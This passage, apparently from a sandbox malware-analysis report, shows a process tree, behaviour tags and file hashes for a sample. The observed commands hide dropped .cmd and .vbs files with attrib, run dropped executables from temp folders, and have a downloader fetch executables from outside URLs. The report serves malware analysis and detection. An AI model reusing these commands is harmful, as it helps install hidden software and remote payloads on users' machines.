- Views/modifies file attributes
PID:672
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\360.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3696
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\Windows\360SE.vbs"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4948
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\360.cmd3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\cpa.cmd3⤵
- System Location Discovery: System Language Discovery
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe".\msn.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:396 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"5⤵
- Executes dropped EXE
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"5⤵
- Executes dropped EXE
PID:3672
-
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4072
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:1892
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD589ec051ab621ccd6ab684bb0f17a25ce
SHA11ef2b94c285bfb602892a6e42b1f4b5ba645315f
SHA2560dcd0d2e9c602f4603d9f914a8e4764a6cd6c9c4e986d110b93d846c524110b3
SHA5122ce9c5a5497d68ca5357d6b7ef0239a0bdc8706428e99fe88b2dd3026fb7c734484d77cee088a625bdcadb7eb8e293d728a7525b28614859640806cabb24b001
-
Filesize
193B
MD5327cff8c30e74afc5af67a19d82774e5
SHA113e1be20402e16f7dbf0d86c00f626070f8c9d16
SHA256bc3ca0ade216627a479f9e92eb08efb88b38384fb2cb75f14757600d9b27f6d9
SHA5120e7295ea48de989929313ceb0ac06afa490a188c756a5d71835fb04283f968c82bfeec72ea68e6fb2d957e4ab9d5bb49e95ee8ca9d5ad3c04d1abfbe0e18c6da
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
1KB
MD520c2b9872ca6f858414a9251ae37dede
SHA1853438b13ee186dcc87d2196781e154289749a0f
SHA256e22076817c4391fcb6c373a2b5c89c79f814e30534316b4627661151a54aa2bf
SHA512716a0ec68f92ef32ce74718e18b56c16095c0a35d29c47e63bdd1d8e8c44967541908cdf9d4ded7906c622c80773f63495c36743ec006a9dc53eed0f429b0192
-
Filesize
575B
MD51e9b64c129e313ec49378f5b823b2ca6
SHA121ecde39469900b9bd551f4a9576c5a9564d4d60
SHA25687334dcec453b142801040c3084219f840a531c94553f06ee817192c121207ee
SHA5120178907df2fa444f463c4c9604bffa7007569daa61b1905dee1b850c9a50754b6bf90c70364ccfc65a609d2dee9f902eefc4b564afcc37fdb253cdfe0bfba840
-
Filesize
1KB
MD53f60b1c32c66c4fafe67b131c81b537e
SHA1abacf3653d89eff785c76bc9de685210da67409d
SHA256306fc7e0980c7e21adf92b220204dfa36baf0f5d107f7de0a167a92f35818a94
SHA51220fcf8215876e448b4d1bfbe8a6ff167cfdb262183364138560b6d5740da0dbf7f0a723763bfc3743240b6fea6fa5f1fa4e25a14a5edb54271bbd7e97fff727a
-
Filesize
104B
MD5b6090a24bad18a0205bb215cb1fd42e6
SHA1da56e637a186333e1fa8401b9600e9efcadbe86b
SHA2565cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8
SHA5124ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4
-
Filesize
1KB
MD520e8b5c5e8779c45d0cffeb223e1b4ee
SHA1e33e7c02fc54766be39b7844f31baae5d474c27e
SHA2565412e0c39e7967064c825e6d487f41d356e423f2b60a272213b0909dae1e22b0
SHA51203c707911e6fe9bd190fe645b0743f7e65a8b0175aee8367a84203be9f213b2c4135a360aaeea63469e76d3dc31a9563a9dd2182f3b24c5489c7addd2d184673
-
Filesize
110B
MD583b98633c669411050739335068d2755
SHA1de25c70f8b5845375efd44ae5e4386380fe27ead
SHA256b057b6c505f2257015ca2efbb6ea86ffe0357ee7cae262191349a208ede27639
SHA512920421a1287091d699bee5480c67f906626f5ff8b4ef6629123a99828e7c6a78ddecc814320b9529f105ed60126df481ec8086173adf1b883d674e6ba3a9364f
-
Filesize
11KB
MD52499bcde9656b2401e95fe6c6d4fe268
SHA1dc7bf897affd9f8e4f870be5fa102009a02f22ed
SHA2563e0c8d48799b9fb4c275a8332a009d6d0bb0a6315343b45aad43c20cfbd4e2b6
SHA512fa3eb6078510a2b70309d279157c60a5ad60c970c35906224ca5a3c9d626ef7b2d2d97fe75a06855a137da80a339ba499e0e4bc8f7fbf88882390710b25289b9
-
Filesize
3KB
MD54e8f8a4f4a836c587f77d3f294286692
SHA1b6ae662e53f5d08f7cbc0c06a08d47930dbaf0cc
SHA256b0367e47ed6fee2d6843d240ac7e83b932466ddd13cc57d971d6cb8e8b2c55a5
SHA51225dfc1a3b4bd4b5c3263f64ae36127bc141138d922316b97bc96c5edd8b84a5b6193b7c687c89ad554d8abee68bc4aad52632a3d98e220352515e380cd749874
-
Filesize
970B
MD54c63083996b714d331f877a7bb204216
SHA1de8807c42284e99ba308ea8ad01cc3f4a8894b0a
SHA25634666e9c92a0260d690f262a23e89a9b4ffa0c5c25178d0f2c1720f4b8d8b569
SHA512f83b239bf307a4864d5f0fcb5c5052b0330ced35af767c48171ca5ec74949aa53219bfe226b9813f0408d979fa0774df89687da1ad36c49ee2ed12e40c842c1d
-
Filesize
797KB
MD5cab7920419ef7ed1e22e9fc4da013bd1
SHA148fc6488e928b4fa5ee75ca74ed1548e316bd6db
SHA256e96c8d5cc0a23032da47280e8835161a959de6965b696328c8a0edf160c3f208
SHA5128393a0160a8e58169554528562e40cf3d4318320475d53377b24dbba42a83026e390a2bb272cdcb89e4d851aac0e75f9cbda65440258569662711f9d1eadc4f0